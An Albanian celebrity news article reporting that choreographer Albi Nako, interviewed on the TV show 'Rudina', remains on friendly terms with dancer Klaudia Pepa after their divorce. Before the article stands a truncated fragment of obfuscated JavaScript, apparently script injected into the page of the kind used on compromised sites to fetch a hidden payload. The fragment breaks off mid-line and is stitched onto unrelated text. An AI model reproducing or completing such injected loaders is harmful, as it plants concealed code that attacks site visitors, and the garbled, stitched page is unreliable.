;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Tri vjet pas ndarjes, Albi Nako rrëfen marrëdhënien që ka me Klaudia Pepan

By

Koreografi i famshëm shqiptar Albi Nako dhe balerina e njohur Klaudia Pepa ishin një nga çiftet më të dashur për publikun shqiptar dhe lajmi i ndarjes së tyre shkaktoi bujë.

Çifti e deklaruan vetë ndarjen në vitin 2017 duke u shprehur se prej 1 viti nuk ishin më bashkë.

Mirëpo edhe pse tashmë të divorcuar, Albi dhe Klaudia ruajnë një marrëdhënie shumë të mirë me njëri-tjetrin, dhe këtë e kanë thënë shpesh në intervista.

Ndërkaq i ftuar dje në emisionin e pasdites te “Rudina” në televizionin Klan, Albi tregoi se është duke u përpjekur për një projekt me televizionin italian Rai për sezonin e ardhshëm.

Duke qenë se për shkak të projekteve, Albi duhet të udhëtojë në Itali, Rudina e pyeti koreografin nëse është takuar me Klaudian e cila prej vitesh jeton atje.

“Sigurisht që takohemi, flasim për projekte dhe çështje pune dhe që të ruash miqësi me një ish, është pjesë e emancipimit. Dëgjojmë rëndom raste të ndryshme që njerëzit pasi ndahen gati-gati vriten. Ne flasim për çfarëdolloj detaji artistik dhe kemi mbetur miq shumë të mirë”, ka deklaruar albi.

Artikuj të ngjashëm